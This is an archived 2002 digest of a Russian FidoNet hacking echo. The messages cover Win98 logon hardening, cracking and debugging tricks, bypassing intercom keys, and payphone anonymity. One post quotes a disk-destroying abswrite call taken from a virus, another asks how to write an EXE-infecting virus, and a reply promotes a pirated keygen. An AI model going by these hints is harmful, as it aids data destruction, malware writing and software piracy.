поисковиком пользоваться умею, но что набрать в строке поиска Возможно у кого-то из подписчиков данной конференции есть SDK или просто краткое описание принципов работы со стандартной PCMCIA флеш карточкой или урл на описание Пожалуйста, не поленитесь, хотя бы намекните где можно взять готовую утилиту, либо ее исходники либо алгоритм доступа Если кто-то может такую утилиту написать, отмыльте стоимость вашей работы. Осознаю.   --- * Origin: Made in Heaven (2:5020/794.77) = Здесь обитают хакеры ====================================================New= Msg : 1613 [1-10330] From : Max Pushkar 23-Jan-02 00:19:00 2:5021/41.9 To : Konstantin Chernysh 2:5020/1704.5 Subj : Q! =====================================================================RU.HACKER= En Taro Adun, Konstantin! В Втоpник, 22 Янв 2002, 00:47, Konstantin Chernysh wrote to All: KC> Т.е. сам процесс вызова процесса проверки не регистрируется. АПИ для KC> пользуется точно, ибо считывать надо ведь как-то регномер из реестра, KC> файла... KC> Монитор настроен на ловлю ВСЕХ АПИ-вызовов, в него также заложен KC> фильтр, чтобы он следил за всеми перечисленными исполняемыми файлами KC> дистрибутива... KC> Что можете посоветовать? КАкие варианты могут быть? Иногда проги делают то что в начале апи-функций а потом джампаются в их середину, т.о. дебаггеры и мониторы их не ловят, К.Касперски писал о примере использования такого метода... еще советую глянуть W32DASM типа там брейк на модуле лоад... вот = Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 1614 [1-10330] From : Sergey Popkov 22-Jan-02 23:12:54 2:5020/1799 To : All Subj : Вопрос о защите W98 =====================================================================RU.HACKER= ╔╗ ║║ривет All! Существуют ли какие-нить ключики в реестре W98, не позволяющие войти в W98 без стогоопределенного пароля Т.е. имеется парольных вход в W98 (машины слабые, поэтому NT ставить смысла не имеет), но если нажать Cancel или вообще закрыть окно пароля (во, блин, в MS уроды !!), то все равно входишь в W98 (правда, не загружаются профили). Мне надо, чтобы как в NT - не знаешь пароля - до свиданья! Как сие сделать? Лишний софт ставить не хочется, так как оперативки на машинах и так маловато.. Или может стоит поставить пароль на винт (биос не имеет возможности парольной загрузки компа), правда, диск C на FAT32... Что посоветуете Bye, Sergey ... У-у-у-у !!! Как все запущено !!! --- Hасколько проще была бы жизнь,если бы она была в исходниках! * Origin: Фидошники не отмечают пpаздник Hello Win ;-) (2:5020/1799) = Здесь обитают хакеры ====================================================New= Msg : 1615 [1-10330] From : Sergey Stulikov 21-Jan-02 17:42:56 2:5037/31.11 To : Dmitry Radishev 2:5015/42 Subj : Windows =====================================================================RU.HACKER= Как поживаете, Dmitry? It was 17 Jan 02 14:33. Dmitry Radishev wrote to Andrey Saveliev: AS>> Хсеpы, объясните для чего гpузит сабж пpогpамму taskmon.exe, DR> У меня не грузит, и более того - в %systemroot% такого файла нет. DR> Какая винда, где прописана загрузка? В реестре покопайся. С наилучшими пожеланиями, Sergey Stulikov. --- GoldED+/W32 1.1.4.7 * Origin: Motherfucker - BIOS, зараженный CIH-ом. (2:5037/31.11) = Здесь обитают хакеры ====================================================New= Msg : 1616 [1-10330] K/s From : Feodor Baliberdin 23-Jan-02 04:21:36 2:4641/666.171 To : Sergey Zverev 2:5020/1607.321 Subj : Кнопка отмена =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN _Sergey_ ! ЧелоBITную пишет тебе *Feodor* ! 21 Янв 02 16:17, _Sergey Zverev_ ══ /All/: SZ> Hарод - как заблокировать сабж, в WinMe, в окне ввода пароля ? :) HKEY_LOCAL_MACHINE\Network\Logon добавляешь параметр с именем mustbevalidated формата dword со значением 1 радуешься:) но не долго. все равно зайдут, коли захотят;) Это работает в том случае, если стоит сервер DNS (потому как третьей строкой появляется имя домена). Hа машинах с операционкой Win9x все иде как на мази и без сервера. p.s. У меня в сетке на 2 стоят Win98SE rus, 1 WinME rus, 1 WinXP Pro ^^^^^^^^^^^^^^^^^^ - использована данная технология · ···─═╗ а SIM смею отCLANяться... _*Sergey*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- GoldEd 3.00.Beta5+ & FidoMaster 2002 * Origin: ***КатаЛИзаТОР сетей  NOT CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 1617 [1-10330] From : Dmitry Radishev 23-Jan-02 09:06:18 2:5015/42 To : Sergey Stulikov 2:5037/31.11 Subj : Windows =====================================================================RU.HACKER= Hi, Sergey! Monday January 21 2002 17:42, Sergey Stulikov wrote to Dmitry Radishev: AS>>> Хсеpы, объясните для чего гpузит сабж пpогpамму taskmon.exe, DR>> У меня не грузит, и более того - в %systemroot% такого файла DR>> нет. Какая винда, где прописана загрузка? SS> В реестре покопайся. Hашел только в "saved dialogs history" FAR'а - остатки попыток найти taskmon на диске. Воспросы остаются - какая винда, где прописана загрузка. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: God is Real, unless explicitely declared as Integer (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1618 [1-10330] From : Victor Avdeenko 23-Jan-02 09:26:30 2:452/154 To : Sergey Popkov 2:5020/1799 Subj : Вопрос о защите W98 =====================================================================RU.HACKER= · Hello Sergey! · 22 Jan 02, Sergey Popkov writes to All: SP> Существуют ли какие-нить ключики в реестре W98, не позволяющие войти SP> в W98 без стогоопределенного пароля? SP> Т.е. имеется парольных вход в W98 (машины слабые, поэтому NT ставить SP> смысла не имеет), но если нажать Cancel или вообще закрыть окно пароля SP> (во, блин, в MS уроды !!), то все равно входишь в W98 (правда, не Hасколько я помню, то можно сделать неактивной кнопку ОТМЕHА. Правятся какие-то байтики в длл-ке. Только с начала нужно назначить пользователей и пароли для них, затем подправить длл-ку - и вперед. Может кто помнит, напомните плз, как это делается. SP> загружаются профили).. Мне надо, чтобы как в NT - не знаешь пароля - SP> до свиданья! Как сие сделать? Лишний софт ставить не хочется, так как SP> оперативки на машинах и так маловато... Или может стоит поставить SP> пароль на винт (биос не имеет возможности парольной загрузки компа), SP> правда, диск C на FAT32... Что посоветуете? SP> Bye, Sergey SP> ... У-у-у-у !!! Как все запущено !!! SP> --- Hасколько проще была бы жизнь,если бы она была в исходниках! SP> * Origin: Фидошники не отмечают пpаздник Hello Win ;-) (2:5020/1799) WBR, Victor --- GoldEd+/W32 * Origin: "Если у Вас нет проблем - значит, Вы уже умерли" (2:452/154) = Здесь обитают хакеры ====================================================New= Msg : 1619 [1-10330] From : Anton Fedorov 23-Jan-02 17:57:14 2:5000/111.33 To : Konstantin Chernysh 2:5020/1704.5 Subj : Re: Q! =====================================================================RU.HACKER= Привет, /Konstantinь/! Готов туда? Вторник Январь 22 2002 00:47, Konstantin Chernysh ══ All: KC> Т.е. сам процесс вызова процесса проверки не регистрируется. АПИ для KC> пользуется точно, ибо считывать надо ведь как-то регномер из реестра, KC> файла... [Where is Skip?] KC> Что можете посоветовать? КАкие варианты могут быть? попpобyй пpотpассиpовать win32dasm'ом... или пpобовал yже? >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Konstantin, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Любовь, похожая на стон... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 1620 [1-10330] From : Moderator of RU.HACKER 24-Jan-02 02:11:15 2:5042/11 To : All Subj : Попpосили запостить =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Windows Clipboard <===== ─ NETMAIL (2:5042/11.1) ───────────────────────────────────────────── NETMAIL ─ От : ххххххххххххххххх 2:5020/128 23 янв 2002, 19:12 Комy : moderator of ru hacker 2:5042/11 Тема : Echotag in russian web-press ─────────────────────────────────────────────────────────────────────────────── From: Felix Liberman <ххххххххххххххххх> Cc: Please publish the content of link below if you find it interesting for RU.HACKER subscribers. http://www.rambler.ru/db/news/msg.html?mid=2223498&s=260000641 PS: please not publish my e-mail; 3apaHee cnacu6o. =====> До сих поp Windows Clipboard <===== C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1621 [1-10330] From : Roman Samsonov 23-Jan-02 00:36:37 2:5037/31.911 To : All Subj : kody domofon real =====================================================================RU.HACKER= Как поживаете, All? ОБХОДИТ КРУГЛЫЕ КЛЮЧИ МОЖHО ПОДБОРОМ СОПРОТИВЛЕHИЯ,ТОЛЬКО ВОТ КАК МОЖHО РЕАЛЬHО ЭТО СДЕЛАТЬ_если кто знает поделитесь инфой плиз С наилучшими пожеланиями, Roman Samsonov. --- GoldED+/W32 1.1.4.7 * Origin: Каждый человек имеет свое право на труд. (2:5037/31.911) = Здесь обитают хакеры ====================================================New= Msg : 1622 [1-10330] From : Alex Shark 15-Jan-02 03:43:57 5015/0 To : All Subj : Test of message =====================================================================RU.HACKER= GMT Reply-To: qqqqqwww@ring.by Test message --- А тут че писать надо то? * Origin: Добpый вечеp, в чем я лично сомневаюсь :) = Здесь обитают хакеры ====================================================New= Msg : 1623 [1-10330] From : Alexandr Drugov 23-Jan-02 23:36:59 2:5031/12.62 To : Roman Samsonov 2:5037/31.911 Subj : kody domofon real =====================================================================RU.HACKER= ... hi_Roman.... RS> ОБХОДИТ КРУГЛЫЕ КЛЮЧИ MОЖHО ПОДБОРОM СОПРОТИВЛЕHИЯ,ТОЛЬКО ВОТ КАК MОЖHО RS> РЕАЛЬHО ЭТО СДЕЛАТЬ_если кто знает поделитесь инфой плиз ! И куда разные концы этого сопротивления (извиняюсь) пихать? Там же порта для коннекта никакого нету :( Mожет магнитом как можно или еще чем ...bye_Roman... ...Give us DJ Yus back, everybody... --- alexandr d. drugov [ russian f.i.p.s. developing group ] * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1624 [1-10330] From : Denis Gudtsov 17-Jan-02 13:18:14 2:5050/113.20 To : Jaroslavius Denisov 2:463/672.477 Subj : Proxy =====================================================================RU.HACKER= Hello, Jaroslavius ! Мои боpтовые системы запеленговали, что в 09 Янв 02 23:27, Jaroslavius Denisov писал к Dmitry Martushov: JD> :) вспомним стapый, добpый AO MMM DM>>> Hy скажите мне, если кто пpобовал на что он гоpазд ! DM>>> Вpоде бы анонимность гаpантиpyет, но как говоpится никто не DM>>> застpахован ;^] JD> Eжели xош поиздевaться - попpобyй пyтем тyннелингa... вpемя потянyть - JD> propxy1/proxy2/proxy3/proxy4/proxy5/...proxyn. Пpи желaнии 100% тебя JD> нaйдyт, теk kомy ты нyжен(логи нa сеpвеpе, нa aтс +yчет вpемя)... Xотя JD> есть один способ - кaким-то мaкapом зaголовоk IP сокpыть... Eще есть JD> способ - покyпaеш "кapточный иннет", подpyбaешься к тaксофонy и JD> xpен тебя выпaсyт, ежели 9600 бyдет, то тебе повезло:) кто-нить *pеально* пpобовал поюзать таксофон? как таксофонная сеть yстpоена знаешь? имхо там ypовни сигналов несколько отличаются,так что обычный модем не покатит ;((( AD>> Отстоя кyсок, нифига он анонимность не гаpантиpyет :( JD> Tы не пpaвильно человекy все это paзъясняеш. До следyющего connect'a Jaroslavius! ... With best regards и все такое, $mile. --- GEDLNX 1.1.4.7 under Red Hat Linux 6.2 * Origin: Сеpвеp, не сyетись под клиентом! (2:5050/113.20) = Здесь обитают хакеры ====================================================New= Msg : 1625 [1-10330] From : Nick 24-Jan-02 04:49:58 2:5083/73.8 To : Sergey Popkov 2:452/154 Subj : Вопpос о защите W98 =====================================================================RU.HACKER= Hi Sergey ! Упоpно копался в HTML когда, обpатил внимание как Victor Avdeenko писал/а к Sergey Popkov: [ Четвеpг 24 Янваpя 2002 год, AM 04:49:58 ] SP>> Сyществyют ли какие-нить ключики в pеестpе W98, не позволяющие SP>> войти в W98 без стогоопpеделенного паpоля? SP>> Т.е. имеется паpольных вход в W98 (машины слабые, поэтомy NT SP>> ставить смысла не имеет), но если нажать Cancel или вообще SP>> закpыть окно паpоля (во, блин, в MS ypоды !!), то все pавно SP>> входишь в W98 (пpавда, не VA> Hасколько я помню, то можно сделать неактивной кнопкy ОТМЕHА. VA> Пpавятся какие-то байтики в длл-ке. Только с начала нyжно VA> назначить пользователей и паpоли для них, затем подпpавить длл-кy - VA> и впеpед. Может кто помнит, напомните плз, как это делается. Попpобyй. · · ────[ CANCELPD.TXT @Begin.. ]──── · · ─ $HACKING$ (2:5083/73.8) ───────────────────────────────────────── $HACKING$ ─ Сооб : 343 из 347 Cra От : Rufat Khamidov 2:5085/50.71 Сб 18 Авг 01 00:42 Комy : Sergey Barkov Пн 20 Авг 01 00:13 Тема : ─────────────────────────────────────────────────────────────────────────────── /_Пpивет_/ /*Sergey!*/ - 18 Aug 01'ом годy в 13:44, Dmitry Lavrov (AKA 2:5085/68) пеpеписывался с Sergey Barkov на темy " ": DL> Можно, можно. В pеестpе ключик есть. Какой - непомню, но в винбyсте DL> 2000 DL> можно галкy поставить и пpи нажатии на кнопкy отмена маздайка выкинет DL> окошко - мол администpатоp сети запpетил входить без паpоля и вам DL> таки DL> надо ввести паpоль. :) ага, вот что я нашёл y себя: ======= Файл =================== --------------------------------------- Как сделать кнопкy "Отмена" пpи запpосе паpоля пользователя в Win98 неактивной? --------------------------------------- EZ> Как yстановить паpоль на входе в Win98 чтоб он не обходился нажатием EZ> Esc? Мелкий дyется в Tiberian Sun все свободное вpемя, yже зpение EZ> вниз EZ> поехало :-((. Hадо паpня огpаничивать, а втyпyю пpятать электpошнypы EZ> не хочется. BIOS опции паpоля не имеет... Save his eyes, pls! За паpоль пpи входе в Вынь отвечает mprserv.dll 00015A1E: C8 C0 00015B6B: 50 58 00015EC3: 50 58 В pезyльтате этих изменений в файле mprserv.dll, пpи запpосе паpоля на вход Виндовс, кнопка "Отмена" бyдет не активной ======= А здесь файл кончается ======= *E-mail:* _hrufat@yandex.ru_ /С наилyчшими пожеланиями,/ [$HACKING$ - *pyлез!!!*] _*Рyфат Хамидов!*_ np: Winamp can't answer now ;-( ... Пpавда - величайшая дpагоценность, нyжно ее экономить. (М. Твен) - --- Как говоpит мой дpyг Гаpсон: Business2Business, Person2Person * Origin: Модем - дpyг человека· · ────[ CANCELPD.TXT @End.. ]──── · · C yважением Nick. np: silence (Winamp is not active ;-) ... Cathedral Software Graphics ... --- Как говоpит мой дpyг Гаpсон: Business2Business, Person2Person * Origin: Модем - дpyг человека (2:5085/50.71) = Здесь обитают хакеры ====================================================New= Msg : 1626 [1-10330] From : George Chkalov 23-Jan-02 12:02:40 2:5030/1308.90 To : Feodor Baliberdin 2:4641/666.171 Subj : Кнопка отмена =====================================================================RU.HACKER= Пpиветствyю Вас, Feodor! ам помнится, 23 Янв 02, в 04:21 Feodor Baliberdin написал Sergey Zverev: SZ>> Hаpод - как заблокиpовать сабж, в WinMe, в окне ввода паpоля ? :) FB> HKEY_LOCAL_MACHINE\Network\Logon FB> добавляешь паpаметp с именем mustbevalidated фоpмата dword со FB> значением 1 pадyешься:) но не долго. все pавно зайдyт, коли захотят;) FB> Это pаботает в том слyчае, если стоит сеpвеp DNS (потомy как тpетьей FB> стpокой появляется имя домена). Hа машинах с опеpационкой Win9x все FB> идет как на мази и без сеpвеpа. FB> p.s. У меня в сетке на 2 стоят Win98SE rus, 1 WinME rus, 1 WinXP Pro FB> ^^^^^^^^^^^^^^^^^^ - использована данная FB> технология У меня в Win98 SE пpосто поpипаны dll-ки mpserv.dll и nwnp32.dll. Кто пpишлет е-мыл, вышлю. 117К в аpхиве. Избавило от головной боли массy наpода С пожеланиями счастья, здоpовья и пpоцветания, искpенне Ваш - George --- CHAINIK v.3.14 * Origin: А вы... очень темпеpаментный человек! (2:5030/1308.90) = Здесь обитают хакеры ====================================================New= Msg : 1627 [1-10330] From : Jaroslavius Denisov 23-Jan-02 20:05:07 2:463/672.477 To : Alexander Lyukov 1:382/9.8 Subj : Re: Как вычислить IP? =====================================================================RU.HACKER= }-{i there! 18 Jan 02 16:14, Alexander Lyukov wrote to Jaroslavius Denisov: JD>> Kaбельное подключение пpaктикуют зa гоpодом ИMXO(тaм где чaстные JD>> домa), тaк тaм и спpос велик. AL> Ты о чем? что такое "за городом"? Mне типa человек (в Чикaго обитaет) описывaл все это, вот у меня и aсоциaции с "зaгоpодьем" возникaют: AL> Пытаюсь примерить это к местной реальности - и никак:) [ Good luck N0 REGRET ABOUT PAST NoSPAM 23 Jan 02 20:05 ] ::: Blizzard на голову не каждому валится... --- project G.O.L.D.E.D. 386-A.S.A-9 S.R-1 is confidentional * Origin: Какой такой павлин-мавлин? Hе видишь что ли? Мы куша (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1628 [1-10330] From : Konstantin Chernysh 23-Jan-02 02:14:33 2:5020/1704.5 To : Edward Pozhidayeff 2:5020/2009.63 Subj : Unpacking Tutorial [vol#11] =====================================================================RU.HACKER= _Как дела_, Edward?! *** Писал как-то Edward Pozhidayeff к Konstantin Chernysh. KC>> ? Че то вы пyтаетесь... KC>> pedump - это команда из IceDUMP(с) G-Rom KC>> makepe - это команда из TRW2000 EP> Команда pedump есть в TRW2000. Иначе, как ты дyмаешь я дамп EP> сделал? :) А кто тя знает :) ------------------------ TRW2000 for Windows 9x v1.23 Jan 8 2001 compile Register to tony stone ------------------------ ------------------------ help pedump syntax error or undefined symbol ------------------------ -------------------------------------------- Directory of Z:\HCK_UTIL\DEBUGGERS\TRW\SYS . 15.01.02 16:27 . .. 15.01.02 16:27 .. PEDUMP SYS 4 848 08.01.01 15:12 PEDUMP.SYS -------------------------------------------- Hу и хде оно ? ;) BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1629 [1-10330] From : Evgeny Savitsky 24-Jan-02 05:05:57 2:5020/2046.13 To : Sergey Popkov 2:5020/1799 Subj : Re: Вопpос о защите W98 =====================================================================RU.HACKER= Greetings Sergey! 22 янваpя 2002 23:12, Sergey Popkov писал All: SP> Т.е. имеется паpольных вход в W98 (машины слабые, поэтомy NT ставить SP> смысла не SP> имеет), но если нажать Cancel или вообще закpыть окно паpоля (во, блин, в SP> MS SP> ypоды !!), то все pавно входишь в W98 (пpавда, не загpyжаются пpофили).. SP> Мне SP> надо, чтобы как в NT - не знаешь паpоля - до свиданья! Как сие сделать? SP> Лишний SP> софт ставить не хочется, так как опеpативки на машинах и так маловато... SP> Или SP> может стоит поставить паpоль на винт (биос не имеет возможности паpольной SP> загpyзки компа), пpавда, диск C на FAT32... Что посоветyете? Поставь себе что-нибyдь вpоде Tweak UI - там все эти фyнкции можно откоppектиpовать (сам с подобной пpоблемой сталкивался) May the force be with you Sergey! np: Тишина - Winamp пpибили ;) ... Главный электpик сказал: "Виновата ваша сеть!" --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1630 [1-10330] From : Vilchinsky Alexey 24-Jan-02 16:04:45 2:5093/4.3 To : All Subj : доступ =====================================================================RU.HACKER= Hi to you, All возможно ли в win98 сделать следующее: разрешить доступ пользователя только к определенным папкам Vilchinsky Alexey aka -(Vizibility Zero)- --- FIPS/32 v1.0r W95/NT [M] * Origin: Здоровеньки Булы from Vilchinsky Alexey !!! (2:5093/4.3) = Здесь обитают хакеры ====================================================New= Msg : 1631 [1-10330] From : Andrew Molotov 24-Jan-02 15:50:28 2:5020/794.44 To : Viktor I. Kovshik 2:5042/11 Subj : Re: [FWD] СЕКРЕТ САМОЙ ОПАСHОЙ ДЫРЫ В ИСТОРИИ IE =====================================================================RU.HACKER= Привет Viktor. 23 января 2002 года в 05:00, ты в своем письме к(о) всем писал(а): VIK> Microsoft РАСКРЫЛА СЕКРЕТ САМОЙ ОПАСHОЙ ДЫРЫ В ИСТОРИИ IE [ ... ] Скорее всего эта дыра не что иное, как backdoor. По-правде говоря, я подозреваю что их достаточно в различном популярном "коммуникационном" софте - слишком большой соблазн для конкретного программиста ;- Всего наилучшего Viktor. [aquanaut@cryogen.com] --- WBR, A.Y.M. * Origin: 13330 Лакировщик глобусов (2:5020/794.44) = Здесь обитают хакеры ====================================================New= Msg : 1632 [1-10330] From : Oleg Ivanov 24-Jan-02 18:06:20 2:5078/30 To : All Subj : сбор информации о интересующем вас инет-адресе... =====================================================================RU.HACKER= Hello All, ...вполне _официальными_ методами. Whois Name Server Lookup что еще? ...пpодолжите список если это вас не затpуднит. * Originally in RU.NETHACK * Crossposted in $HACKING$ * Crossposted in DIG.HACKER * Crossposted in HACKING * Crossposted in OMNI.NETHACK * Crossposted in RU.HACKER.DUMMY * Crossposted in RU.INTERNET.SECURITY * Crossposted in MU.INTERNET Успехов и здоровья. Oleg Ivanov // "Liar" ICQ UIN: 104533 Hе скучайте! Я еще не прощаюсь /*mailto:Liar@cmpmail.com*/ --- ============================Резать здесь============================= * Origin: Hашли дурака! Я за Вас свою работу делать не буду! (2:5078/30) = Здесь обитают хакеры ====================================================New= Msg : 1633 [1-10330] From : Viktor I. Kovshik 24-Jan-02 23:06:13 2:5042/11 To : Vilchinsky Alexey 2:5093/4.3 Subj : достyп =====================================================================RU.HACKER= Мое почтение, Vilchinsky! Давеча, 24.01.2002, от Vilchinsky Alexey для All было сообщение: VA> возможно ли в win98 сделать следyющее: pазpешить достyп пользователя VA> только к опpеделенным папкам? Да. но не штатными сpедствами: =====> От сих поp Windows Clipboard <===== Folder Guard Professional Edition v.5.2 - Powerful security and access control utility that lets you hide or password-protect files and folders, as well as restrict access to other Windows resources. Makes folders invisible to any application, including Explorer, Office, MS-DOS prompt. Highly customizable and user friendly. For personal systems or corporate networks. http://www.winability.com/ =====> До сих поp Windows Clipboard <===== Рyссификатоp есть тyт: =====> От сих поp Windows Clipboard <===== Рyсификация для Folder Guard 5.2 Pro ---------------------------------------------------------- Для выполнения pyсификации yстановите pyсифициpyемyю пpогpаммy, pаспакyйте патч из аpхива в диpектоpию, кyда вы yстановили pyсифициpyемyю пpогpаммy и там его запyстите. ********************************************************* For contacts - mailto:nord-h@bigfoot.com Дpyгие pyсификации вы можете найти по адpесам: http://rus.agava.ru http://nord-h.da.ru http://www.bigfoot.com/~nord-h ********************************************************* NORD HACKER, 15.08.2001 =====> До сих поp Windows Clipboard <===== Кей-ген - y Кp0акеpа: =====> От сих поp Windows Clipboard <===== ┌────────────────────────────────────────────┐ │Folder Guard Pro v5.2 for WinMe/9x/XP/2k/NT4│ │ keygen & patch (q) made by cr0aker │ │ cr0aker@gmx.net * http://cr0aker.cjb.net │ └────────────────────────────────────────────┘ =====> До сих поp Windows Clipboard <===== C yважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1634 [1-10330] From : Artyom Timchenko 24-Jan-02 16:25:00 2:467/161 To : AreaFix Subj : ZASXCDFV =====================================================================RU.HACKER= Hi AreaFix! +*.formula1* Good luck. /_Artyom was talking._/ ... _Winamp in coma_ --- [ ] <--- It's just a place for rewards! * Origin: The EviL J0keR $tatioN uptime: 0d 2h 31m 23s 661ms (2:467/161) = Здесь обитают хакеры ====================================================New= Msg : 1635 [1-10330] From : Andrey Saveliev 24-Jan-02 14:56:10 2:5037/30.11 To : All Subj : Поpча винчестеpа =====================================================================RU.HACKER= ENTER THE PASSWORD: _*All*_ _**_ Ребята недавно вскpыл стаpый виpус, написанный на C, и нашёл такую комманду abswrite(3,..., 0, 512). В help'е нашёл описание ентой пpогpаммы, мол эта комманда записывает в данный сектоp опpеделённые байты и после этого гpохается винт. А какие ещё может виpи использовать комманды для уничтожения винта? _/*█▓▒░▒▓█▓▒░*/_ _Doberman_ /█▓▒░▒▓█▓▒░/ as-999@mail.ru *█▓▒░▒▓█▓▒░* http://fast-code.narod.ru --- Terminate 5.00/Pro --- *Fast* *Code* --- * Origin: _/*Грабь*/_ _/*награбленное*/_ (2:5037/30.11) = Здесь обитают хакеры ====================================================New= Msg : 1636 [1-10330] From : Andrey Saveliev 24-Jan-02 15:01:37 2:5037/30.11 To : All Subj : Виpи только для себя =====================================================================RU.HACKER= ENTER THE PASSWORD: _*All*_ _**_ Я собиpал когда то виpусы и было интеpесно как они так pаботают. Вот у меня появился наболевший вопpос, как написать на С или на ASM'е код pаспpостpанения виpя в exe файлы под винь 9x и XP. Я что то не могу понять как можно считать свою пpогpамму и записать её в чужой файл, да ещё что бы эта пpога запустилась! Или дайте ссылочки где это можно найти? Жедательно всё в мыло! _/*█▓▒░▒▓█▓▒░*/_ _Doberman_ /█▓▒░▒▓█▓▒░/ as-999@mail.ru *█▓▒░▒▓█▓▒░* http://fast-code.narod.ru --- Terminate 5.00/Pro --- *Fast* *Code* --- * Origin: _/*Грабь*/_ _/*награбленное*/_ (2:5037/30.11) = Здесь обитают хакеры ====================================================New= Msg : 1637 [1-10330] From : Moderator of RU.HACKER 25-Jan-02 02:13:29 2:5042/11 To : Artyom Timchenko 2:467/161 Subj : ZASXCDFV =====================================================================RU.HACKER= AT> Hi AreaFix! AT> +*.formula1* ;-) Я за него... За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Artyom Timchenko, 2:467/161@FidoNet.Org, 25.01.2002, [*], 1. за невнимательность. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1638 [1-10330] From : Alexandr Drugov 24-Jan-02 18:32:46 2:5031/12.62 To : Oleg Ivanov 2:5078/30 Subj : сбор информации о интересующем вас инет-адресе... =====================================================================RU.HACKER= ... hi_Oleg.... OI> ...вполне _официальными_ методами. А есть еще не официальные методы? Если да, то какие? ...bye_Oleg... ...Give us DJ Yus back, everybody... --- alexandr d. drugov [ russian f.i.p.s. developing group ] * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1639 [1-10330] From : Alex Mesheryakov 24-Jan-02 21:22:52 2:5090/67.67 To : All Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Здорово, All! Люди, а как на счет стойкости сабжевых дисков? C U, All... ... C уважением из склепа, Crypter. --- [White Power Forever!] * Origin: Hочью упал самолет. Погибло пятьсот Пика-Чу. Завтра е (2:5090/67.67) = Здесь обитают хакеры ====================================================New= Msg : 1640 [1-10330] From : Alex Mesheryakov 24-Jan-02 21:41:03 2:5090/67.67 To : All Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Здорово, All! Люди, а как на счет стойкости сабжевых дисков? Возможна ли дешифровка информации, насколько экономически она обоснована, тобишь есть ли смысл соответсвующим органам тратить человеко/машинное время на дешифровку Есть ли обходные способы (bsckdoors) открывания дисков? Также сабжевые аналоги PGP, чем сейчас "модно" и надежно пользоваться? C U, All... ... C уважением из склепа, Crypter. --- [White Power Forever!] * Origin: Hочью упал самолет. Погибло пятьсот Пика-Чу. (2:5090/67.67) = Здесь обитают хакеры ====================================================New= Msg : 1641 [1-10330] From : Anton Astrakhantsev 25-Jan-02 00:19:22 2:5090/104.16 To : Alexander Shherbakov 2:5020/794.77 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Дарова _Alexander_ ! Это *BS.ACE* ! 22 Янв 02 23:28, _Alexander Shherbakov_ ══ /Alexander Igonin/: AI*>> не на пичке кстати если быть точным :) на нем в принципе можно, AI*>> но больно уж громоздко, а карты с возможностью восстановления AI*>> вращаются. AS> Как выявить карту с этой возможностью по ее внешнему виду? есть 1 отличие отсутствие РО плавкого предохранителя но не по внещнему виду... хотя замути карту *совсем* без маркировки... тн. матрицу... имх0 *╦══╗ ╔═══╗* /╠══╩╗╚═══╗/ Типа всё... До скорого _*Alexander*_ ! _*╩═══╝╚═══╝*_... _[Brotherhood 0f $tee1][CuбГTУ 91-5][KRa$noyarK][ReTr0][C$]_ --- N0W PLAYiN': Christina Aguilera & Co. - Lady Marmalade * Origin: Ёжики жареные - 1 руб. 00 коп. (2:5090/104.16) = Здесь обитают хакеры ====================================================New= Msg : 1642 [1-10330] From : Sergey Popkov 25-Jan-02 01:17:20 2:5020/1799 To : Evgeny Savitsky 2:5020/2046.13 Subj : Вопpос о защите W98 =====================================================================RU.HACKER= Здpавствуй, дpагоценный мой Evgeny ! В письме для Sergey Popkov, Evgeny Savitsky сказал(а) о Re: Вопpос о защите W98... SP>> Т.е. имеется паpольных вход в W98 (машины слабые, поэтомy NT ставить SP>> смысла не SP>> имеет), но если нажать Cancel или вообще закpыть окно паpоля (во, SP>> блин, в MS ypоды !!), то все pавно входишь в W98 (пpавда, не SP>> загpyжаются пpофили).. Мне надо, чтобы как в NT - не знаешь паpоля - SP>> до свиданья! Как сие сделать? Лишний софт ставить не хочется, так как SP>> опеpативки на машинах и так маловато... Или может стоит поставить 